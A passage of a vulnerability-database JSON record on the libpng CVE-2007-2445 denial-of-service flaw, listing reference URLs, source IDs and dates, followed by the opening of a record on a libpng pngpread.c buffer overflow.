"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-1382"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0040"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-6218"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-5907"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/684664"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/advisories"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5116"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5269"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2741"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5135"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0160"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2026"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5268"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3108"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0338"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-1536"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3108"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1969"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-1536"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5266"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2741"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1205"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1664"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0338"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201412-11.xml"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2026"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-0720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-2877"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0339"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1969"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2445"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-0720"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-4995"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-4995"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2877"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0339"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5116"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1664"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://www.digicamsoft.com/bmp/bmp.html"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5267"
},
{
"trust": 0.1,
"url": "http://code.google.com/android/adc.html"
},
{
"trust": 0.1,
"url": "http://enigmail.mozdev.org"
},
{
"trust": 0.1,
"url": "http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/ar2008021101944.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0986"
},
{
"trust": 0.1,
"url": "http://www.infoworld.com/article/08/02/27/09tc-google-android_1.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0985"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/png/"
},
{
"trust": 0.1,
"url": "http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html"
},
{
"trust": 0.1,
"url": "http://code.google.com/p/android/issues"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/corelabs"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://www.wiley.com/wileycda/wileytitle/productcd-047008023x.html"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://www.openhandsetalliance.com/android_overview.html"
},
{
"trust": 0.1,
"url": "http://www.w3.org/graphics/gif/spec-gif89a.txt"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-5793"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/corelabs/."
},
{
"trust": 0.1,
"url": "http://code.google.com/p/android/downloads/list"
},
{
"trust": 0.1,
"url": "http://openpkg.com/security/signatures/"
},
{
"trust": 0.1,
"url": "http://openpkg.org/go/package/png"
},
{
"trust": 0.1,
"url": "http://openpkg.com/\u003e"
},
{
"trust": 0.1,
"url": "http://openpkg.com/"
},
{
"trust": 0.1,
"url": "http://www.libpng.org/pub/png/"
},
{
"trust": 0.1,
"url": "http://openpkg.com/go/openpkg-sa"
},
{
"trust": 0.1,
"url": "http://openpkg.com/openpkg.com.pgp"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#684664"
},
{
"db": "BID",
"id": "24000"
},
{
"db": "BID",
"id": "24023"
},
{
"db": "PACKETSTORM",
"id": "68410"
},
{
"db": "PACKETSTORM",
"id": "75976"
},
{
"db": "PACKETSTORM",
"id": "57069"
},
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "57151"
},
{
"db": "PACKETSTORM",
"id": "64260"
},
{
"db": "PACKETSTORM",
"id": "56849"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000397"
},
{
"db": "NVD",
"id": "CVE-2007-2445"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CERT/CC",
"id": "VU#684664",
"ident": null
},
{
"db": "BID",
"id": "24000",
"ident": null
},
{
"db": "BID",
"id": "24023",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "68410",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "75976",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "57069",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "129524",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "57151",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "64260",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "56849",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2007-000397",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2007-2445",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2007-05-16T00:00:00",
"db": "CERT/CC",
"id": "VU#684664",
"ident": null
},
{
"date": "2007-05-15T00:00:00",
"db": "BID",
"id": "24000",
"ident": null
},
{
"date": "2007-05-16T00:00:00",
"db": "BID",
"id": "24023",
"ident": null
},
{
"date": "2008-07-22T17:59:59",
"db": "PACKETSTORM",
"id": "68410",
"ident": null
},
{
"date": "2009-03-24T04:24:53",
"db": "PACKETSTORM",
"id": "75976",
"ident": null
},
{
"date": "2007-06-07T06:18:46",
"db": "PACKETSTORM",
"id": "57069",
"ident": null
},
{
"date": "2014-12-12T17:43:12",
"db": "PACKETSTORM",
"id": "129524",
"ident": null
},
{
"date": "2007-06-13T00:51:14",
"db": "PACKETSTORM",
"id": "57151",
"ident": null
},
{
"date": "2008-03-04T22:33:55",
"db": "PACKETSTORM",
"id": "64260",
"ident": null
},
{
"date": "2007-05-21T03:50:57",
"db": "PACKETSTORM",
"id": "56849",
"ident": null
},
{
"date": "2007-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200705-347",
"ident": null
},
{
"date": "2007-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-000397",
"ident": null
},
{
"date": "2007-05-16T22:30:00",
"db": "NVD",
"id": "CVE-2007-2445",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2007-08-23T00:00:00",
"db": "CERT/CC",
"id": "VU#684664",
"ident": null
},
{
"date": "2009-03-23T15:56:00",
"db": "BID",
"id": "24000",
"ident": null
},
{
"date": "2007-05-30T00:04:00",
"db": "BID",
"id": "24023",
"ident": null
},
{
"date": "2009-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200705-347",
"ident": null
},
{
"date": "2009-04-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-000397",
"ident": null
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-2445",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "57151"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "Libpng Library Remote Denial of Service Vulnerability",
"sources": [
{
"db": "BID",
"id": "24000"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347"
}
],
"trust": 0.9
},
"type": {
"_id": null,
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "24000"
},
{
"db": "BID",
"id": "24023"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-347"
}
],
"trust": 1.2
}
}
VAR-201006-1188
Vulnerability from variot - Updated: 2026-03-09 20:23Buffer overflow in pngpread.c in libpng before 1.2.44 and 1.4.x before 1.4.3, as used in progressive applications, might allow remote attackers to execute arbitrary code via a PNG image that triggers an additional data row. Libpng contains a vulnerability in the way it handles images containing an extra row of image data beyond the height reported in the image header. libpng is a PNG reference library that can create, read and write PNG graphics files. There is a buffer overflow vulnerability in the libpng library when processing graphics row data. If the graphics file provides an extra graphics row that is higher than the height reported in the header, this overflow can be triggered, resulting in arbitrary code execution; in addition, when processing a certain There may be a memory leak when some sCAL blocks are used, and specially crafted PNG graphics may cause a denial of service. ----------------------------------------------------------------------
"From 2007 to 2009 vulnerabilities in a typical end-user PC almost doubled from about 220 to 420."
Non-Microsoft software to blame for increase in vulnerabilities affecting typical Windows end-users, read more:
http://secunia.com/gfx/pdf/Secunia_Half_Year_Report_2010.pdf
TITLE: Mozilla Thunderbird Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA40642
